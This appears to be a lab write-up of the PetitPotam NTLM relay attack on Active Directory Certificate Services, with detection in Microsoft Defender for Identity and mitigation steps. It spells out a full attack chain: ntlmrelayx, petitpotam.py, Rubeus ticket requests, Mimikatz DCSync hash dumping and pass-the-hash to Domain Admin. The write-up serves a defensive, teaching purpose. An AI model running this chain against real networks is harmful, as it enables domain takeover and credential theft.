PetitPotam…from attack to detection via Microsoft Defender for Identity (MDI)
PetitPotam is a NTLM relay attack on Active Directory Certificate Services (AD CS) HTTP Endpoints. If the following AD CA services are installed the Active Directory is vulnerable to the attack.
See KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) for more information how to mitigate.
My lab setup for the attack is shown below.
The Domain Controllers have the latest Microsoft 365 Defender for Identity (MDI) sensors installed.
Verify vulnerable certificates templates via PSPKIAudit on the Windows 10 machine (I added Everyone with Full Control on the Computer template certificate).
Invoke-PKIAudit -CAComputerName WSRV2016-DC01.s3cur1ty.local
PetitPotam is a PoC (Proof of Concept) tool which exploits the MS-EFSRPC (Encrypting File System Remote) protocol to force a Windows hosts (WSRV2016-DC02; 192.168.178.11) to authenticate to another host (Kali linux; 192.168.178.49).
An attacker can target a Domain Controller (WSRV2016-DC02; 192.168.178.11) and relay DC NTLM credentials to the Active Directory Certificate Services (AD CA) Web enrollment pages to enroll a DC certificate.
Start ntlmrelayx.py and wait for connection to the AD CS (WSRV2016-DC01;192.168.178.10) and a (computer) certificate is requested.
python3 ntlmrelayx.py -t http://192.168.178.10/certsrv/certfnsh.asp -smb2support --adcs
after NtlmRelayx is started, run PetitPotam (from the example above) to the 2nd domain controller (WSRV2016-DC02 send machine credentials to Kali Linux).
python3 petitpotam.py 192.168.178.49 192.168.178.11
Authenticating to http://192.168.178.10 as S3CUR1TY/WSRV2016-DC02$ succeeded, a CSR is generated and a Base64 certificate is created of user S3CUR1TY/WSRV2016-DC02$.
We can see the issued Certificate in the Certification Authority application on the AD CA.
The Base64 certificate can be used to request a TGT (Ticket Granting Ticket) Kerberos ticket.
Rubeus.exe asktgt /user:WSRV2016-DC02$ /certificate:<base64-certificate> /ptt
Keep in mind to use the latest version of Rubeus for /certificate parameter support.
With klist we can see the cached Kerberos ticket(s) on the local machine with privileges for DCSync.
MimiKatz — DCSync
DCSync is a MimiKatz module to dump the password hashes of all users from the Domain Controller over the network without interactive logon.
lsadump::dcsync /domain:s3cur1ty.local /all /csv
The output is the NTLM hash of a Domain Admin (SID ends with 512) account (e.g. Administrator in our example).
MimiKatz — Pass the hash
PTH (Pass-the-hash) is a MimiKatz module to start a command prompt (or /run:powershell.exe will run PowerShell) in the context of the Administrator account with Domain Admin privileges.
Before PTH we don’t have access to the Domain Controller.
sekurlsa::pth /user:Administrator /domain:s3cur1ty.local /ntlm:6cff5d10edb2c4…
The command prompt (cmd.exe) has Domain Admin privileges and we can access the Domain Controller.
And …GAME OVER :-)
Microsoft Defender for Identity
Microsoft Defender for Identity is the Microsoft tool to detect attacks and/or anomalies on the Active Directory like Golden Ticket (forged TGT) or Silver Ticket (forget TGS) attack for example.
Microsoft Defender for Identity version 2.158.14362 detects the PetitPotam attack on Active Directory Certificate Services. The alert is Suspicious network connection over Encrypting File System Remote Protocol
The DCSync attack is also detected by Microsoft Defender for Identity.
Microsoft 365 Defender
Microsoft 365 Defender is the XDR (eXtended Detection and Respond) tool to detect correlated alerts into a single Incident for ease of investigation and (automatic) remediation (AIR).
Microsoft 365 Defender provides a protection layer (IPC, MDI, MDE, MDO & MCAS) over all assets of the Modern Workplace (Identity, Devices, Apps & Data).
Defense in-depth or zero trust is the most practical approach against new (0-day) attacks, even if some detections capabilities are not yet implemented.
Remove NTLM authentication from the AD CS CertSrv in IIS (Internet Information Service)
Or remove the Certificate Enrollment Web Service completely if not required.